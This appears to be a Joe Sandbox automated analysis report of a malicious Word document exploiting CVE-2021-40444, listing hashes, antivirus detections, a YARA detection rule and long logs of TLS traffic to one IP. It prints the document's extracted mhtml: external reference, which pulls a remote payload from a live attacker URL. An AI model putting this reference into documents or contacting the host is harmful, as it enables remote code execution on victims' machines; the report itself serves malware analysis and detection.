Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nnxPt0Yydv.doc

Overview

General Information

Sample Name:nnxPt0Yydv.doc
Analysis ID:696518
MD5:15b691f0c5d627e71fed8a5d34fb0328
SHA1:1c7cb38d8fc2f01a6331ade0fdf4cb9779a5ae74
SHA256:3833142e8b5a9174615c83c1165fa67bd9f46a230058adf8fc9cbb081bb92d30
Tags:CVE-2022-30190docFollina
Infos:

Detection

CVE-2021-40444
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Detected CVE-2021-40444 exploit
Contains an external reference to another file
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2476 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
document.xml.relsEXPL_CVE_2021_40444_Document_Rels_XMLDetects indicators found in weaponized documents that exploit CVE-2021-40444Jeremy Brown / @alteredbytes
  • 0x3f8:$b1: /relationships/oleObject
  • 0x412:$c1: Target="mhtml:http
  • 0x45f:$c2: !x-usc:http
  • 0x4a7:$c3: TargetMode="External"

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: nnxPt0Yydv.docAvira: detected
Multi AV Scanner detection for submitted file
Source: nnxPt0Yydv.docReversingLabs: Detection: 50%
Source: nnxPt0Yydv.docVirustotal: Detection: 48%Perma Link

Exploits

barindex
Detected CVE-2021-40444 exploit
Source: document.xml.relsExtracted files from sample: mhtml:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6!x-usc:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6
Source: unknownHTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknownHTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknownHTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknownHTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global trafficTCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global trafficTCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global trafficTCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
